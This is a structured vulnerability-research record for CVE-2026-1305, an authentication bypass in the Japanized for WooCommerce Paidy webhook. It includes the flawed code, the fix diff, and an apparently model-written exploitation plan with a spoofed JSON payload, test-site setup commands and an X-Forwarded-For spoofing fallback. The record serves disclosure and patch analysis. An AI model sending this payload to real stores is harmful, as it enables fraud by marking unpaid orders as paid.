[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKdlJasepdVFBZDc297M8H2Purd41tWN1ZHYpMYfZwdE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-1305","japanized-for-woocommerce-missing-authorization-to-unauthenticated-paidy-order-manipulation","Japanized for WooCommerce \u003C= 2.8.4 - Missing Authorization to Unauthenticated Paidy Order Manipulation","The Japanized for WooCommerce plugin for WordPress is vulnerable to Improper Authentication in versions up to, and including, 2.8.4. This is due to a flawed permission check in the `paidy_webhook_permission_check` function that unconditionally returns `true` when the webhook signature header is omitted. This makes it possible for unauthenticated attackers to bypass payment verification and fraudulently mark orders as \"Processing\" or \"Completed\" without actual payment via a crafted POST request to the Paidy webhook endpoint.","woocommerce-for-japan",null,"\u003C=2.8.4","2.8.5","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Improper Authentication","2026-02-26 21:04:26","2026-02-27 09:23:47",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F8cef4b2b-ae8d-4e18-b763-6960a0b944f7?source=api-prod",1,[22,23,24],"includes\u002Fgateways\u002Fpaidy\u002Fclass-wc-paidy-endpoint.php","readme.txt","woocommerce-for-japan.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-1305 (Japanized for WooCommerce)\n\n## 1. Vulnerability Summary\nThe **Japanized for WooCommerce** plugin (versions \u003C= 2.8.4) contains an Improper Authentication vulnerability in its Paidy payment gateway webhook handler. The function `paidy_webhook_permission_check` is responsible for authorizing requests to the Paidy REST API endpoint. However, the logic contains a flaw: it only enforces signature verification if the `x-paidy-signature` header is present. If the header is omitted entirely and no IP whitelist is configured (which is the default state), the function returns `true`, granting unauthenticated access to order manipulation logic.\n\nThis allows an attacker to spoof payment notifications from Paidy and force WooCommerce orders into the \"Processing\" or \"Completed\" status without actual payment.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002Fpaidy\u002Fv1\u002Forder`\n- **Hook:** `rest_api_init` via `WC_Paidy_Endpoint::paidy_register_routes()`\n- **Authentication:** None (Unauthenticated)\n- **Vulnerable Function:** `paidy_webhook_permission_check` in `includes\u002Fgateways\u002Fpaidy\u002Fclass-wc-paidy-endpoint.php`\n- **Payload Carry:** JSON body in a POST request.\n- **Preconditions:** \n    1. The Paidy payment gateway must be enabled in WooCommerce.\n    2. A target order must exist with the payment method set to `paidy`.\n    3. The default `paidy_webhook_allowed_ips` filter must be empty (default).\n\n## 3. Code Flow\n1. **Entry Point:** A POST request is made to `\u002Fwp-json\u002Fpaidy\u002Fv1\u002Forder`.\n2. **Permission Check:** The REST API calls `paidy_webhook_permission_check($request)`.\n3. **Bypass:** \n   - `$signature = $request->get_header( 'x-paidy-signature' );` returns `null` if the header is missing.\n   - `if ( empty( $signature ) )` block executes.\n   - `$allowed_ips` is empty by default (`apply_filters( 'paidy_webhook_allowed_ips', array() )`).\n   - The code skips the IP check and proceeds to `return true;` at the end of the function.\n4. **Processing:** `paidy_check_webhook($data)` is called.\n5. **Logic Sink:**\n   - `$body_data = (array) $data->get_body();`\n   - `$main_data = json_decode( $body_data[0], true );`\n   - It fetches the order via `wc_get_order( $main_data['order_ref'] )`.\n   - It verifies `$order->get_payment_method() === 'paidy'`.\n   - If `$main_data['status'] === 'authorize_success'`, it calls `$order->payment_complete($main_data['payment_id'])`.\n   - This transitions the order status (typically to `processing`).\n\n## 4. Nonce Acquisition Strategy\n**No WordPress Nonce is required.**\nThe endpoint is a REST API route designed for external webhooks (Paidy). It uses a custom `permission_callback` instead of `_wpnonce`. Since the vulnerability allows bypassing the signature check used for external authentication, no additional tokens or nonces are needed to access the endpoint.\n\n## 5. Exploitation Strategy\nThe exploit will be performed using the `http_request` tool to send a crafted JSON payload.\n\n### Step-by-Step Plan:\n1. **Identify\u002FCreate Order:** Create a WooCommerce order with the status `pending` and payment method `paidy`.\n2. **Craft Payload:** Prepare a JSON object with the order ID and the success status.\n3. **Send Request:** Execute a POST request to the REST API without the `x-paidy-signature` header.\n4. **Verify:** Check the order status to ensure it has changed to `processing`.\n\n### Payload (JSON):\n```json\n{\n  \"payment_id\": \"pay_spoofed_9999\",\n  \"order_ref\": \"ORDER_ID_HERE\",\n  \"status\": \"authorize_success\"\n}\n```\n\n### HTTP Request Details:\n- **Method:** `POST`\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fpaidy\u002Fv1\u002Forder`\n- **Headers:**\n  - `Content-Type: application\u002Fjson`\n- **Body:** The JSON payload above.\n\n## 6. Test Data Setup\nTo simulate a vulnerable environment, perform the following via WP-CLI:\n\n1. **Enable Plugin:**\n   ```bash\n   wp plugin activate woocommerce-for-japan\n   ```\n2. **Configure Paidy (Minimal):**\n   ```bash\n   wp option update woocommerce_paidy_settings '{\"enabled\":\"yes\", \"testmode\":\"yes\"}'\n   ```\n3. **Create a Product:**\n   ```bash\n   PRODUCT_ID=$(wp post create --post_type=product --post_title=\"Test Product\" --post_status=publish --porcelain)\n   wp post term add $PRODUCT_ID product_type simple\n   ```\n4. **Create a \"Paidy\" Order:**\n   ```bash\n   ORDER_ID=$(wp wc order create --user=1 --payment_method=paidy --status=pending --porcelain)\n   # Ensure the item is added so the order isn't empty\n   wp wc order_item create $ORDER_ID --name=\"Test Item\" --quantity=1 --total=100\n   ```\n   *Note: Using `wp wc order create` with `--payment_method=paidy` is critical for passing the plugin's security check.*\n\n## 7. Expected Results\n- **HTTP Response:** The endpoint should return a `200 OK` status with a JSON response echoing the `payment_id` or a success message.\n- **Side Effect:** The WooCommerce order associated with `ORDER_ID` should be updated from `pending` to `processing`.\n- **Log:** If debug logging is enabled in the plugin, the `paidy-wc` log will show \"Paidy Webhook received... Exist [payment_id] and [order_ref]\".\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the order status using WP-CLI:\n```bash\nwp wc order get \u003CORDER_ID> --field=status\n```\nExpected output: `processing`\n\nCheck for the order note added by the plugin:\n```bash\nwp wc order_note list \u003CORDER_ID>\n```\nExpected: A note containing \"It succeeded to check the authorization of the order in Paidy Webhook.\"\n\n## 9. Alternative Approaches\nIf the order is already in `processing`, the plugin code contains a branch for `authorize_success` when status is `processing` (truncated in the provided source). The attacker could also try different status values like `capture_success` (though `authorize_success` is the most direct path to marking an order as paid).\n\nIf IP validation is active, the attacker could attempt to spoof the `HTTP_X_FORWARDED_FOR` header, as the `get_remote_ip()` function in `WC_Paidy_Endpoint` prioritizes it:\n```php\nif ( ! empty( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) {\n    $ip = sanitize_text_field( wp_unslash( $_SERVER['HTTP_X_FORWARDED_FOR'] ) );\n```\nHowever, since `allowed_ips` defaults to an empty array, the bypass is usually unconditional.","The Paidy payment gateway in Japanized for WooCommerce fails to properly authenticate webhook requests when the 'x-paidy-signature' header is missing. By default, the plugin lacks an IP whitelist, causing the permission check to unconditionally return true and allowing unauthenticated attackers to spoof payment notifications.","\u002F\u002F includes\u002Fgateways\u002Fpaidy\u002Fclass-wc-paidy-endpoint.php:67\npublic function paidy_webhook_permission_check( $request ) {\n\t\u002F\u002F Get the signature from the header.\n\t$signature = $request->get_header( 'x-paidy-signature' );\n\n\t\u002F\u002F If no signature header, check if this is from allowed IP (optional).\n\tif ( empty( $signature ) ) {\n\t\t\u002F\u002F Allow filtering of IP whitelist.\n\t\t$allowed_ips = apply_filters( 'paidy_webhook_allowed_ips', array() );\n\n\t\tif ( ! empty( $allowed_ips ) ) {\n\t\t\t$remote_ip = $this->get_remote_ip();\n\t\t\tif ( ! in_array( $remote_ip, $allowed_ips, true ) ) {\n\t\t\t\treturn new WP_Error(\n\t\t\t\t\t'paidy_unauthorized',\n\t\t\t\t\t__( 'Unauthorized access to Paidy webhook.', 'woocommerce-for-japan' ),\n\t\t\t\t\tarray( 'status' => 403 )\n\t\t\t\t);\n\t\t\t}\n\t\t}\n\t}\n\n\t\u002F\u002F Verify the signature if present.\n\tif ( ! empty( $signature ) ) {\n\t\t\u002F\u002F ... [signature verification logic] ...\n\t}\n\n\treturn true;\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoocommerce-for-japan\u002F2.8.4\u002Fincludes\u002Fgateways\u002Fpaidy\u002Fclass-wc-paidy-endpoint.php\t2026-01-06 01:35:06.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoocommerce-for-japan\u002F2.8.5\u002Fincludes\u002Fgateways\u002Fpaidy\u002Fclass-wc-paidy-endpoint.php\t2026-02-19 08:53:04.000000000 +0000\n@@ -78,7 +78,16 @@\n \t\t\t\t\t\tarray( 'status' => 403 )\n \t\t\t\t\t);\n \t\t\t\t}\n+\t\t\t\t\u002F\u002F IP validation passed.\n+\t\t\t\treturn true;\n \t\t\t}\n+\n+\t\t\t\u002F\u002F No signature AND no IP whitelist configured - REJECT.\n+\t\t\treturn new WP_Error(\n+\t\t\t\t'paidy_unauthorized',\n+\t\t\t\t__( 'Missing signature header for Paidy webhook.', 'woocommerce-for-japan' ),\n+\t\t\t\tarray( 'status' => 403 )\n+\t\t\t);\n \t\t}\n \n \t\t\u002F\u002F Verify the signature if present.\n@@ -103,9 +112,16 @@\n \t\t\t\t\tarray( 'status' => 403 )\n \t\t\t\t);\n \t\t\t}\n+\t\t\t\u002F\u002F Signature validation passed.\n+\t\t\treturn true;\n \t\t}\n \n-\t\treturn true;\n+\t\t\u002F\u002F Should never reach here, but reject by default.\n+\t\treturn new WP_Error(\n+\t\t\t'paidy_unauthorized', \n+\t\t\t__( 'Unauthorized access to Paidy webhook.', 'woocommerce-for-japan' ),\n+\t\t\tarray( 'status' => 403 )\n+\t\t);","The exploit targets the Paidy webhook REST API endpoint at \u002Fwp-json\u002Fpaidy\u002Fv1\u002Forder. An attacker sends an unauthenticated POST request containing a JSON payload with a valid order_ref (order ID) and the status set to 'authorize_success'. By omitting the 'x-paidy-signature' header entirely, the attacker triggers a logic flaw where the plugin fails to validate the request against a signature or a default-empty IP whitelist, ultimately returning 'true' for the permission check. This results in the order being marked as paid (typically moving it to 'processing' status) without a legitimate payment transaction occurring.","gemini-3-flash-preview","2026-04-18 22:58:12","2026-04-18 22:58:31",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","2.8.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-for-japan\u002Ftags\u002F2.8.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce-for-japan.2.8.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-for-japan\u002Ftags\u002F2.8.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce-for-japan.2.8.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-for-japan\u002Ftags"]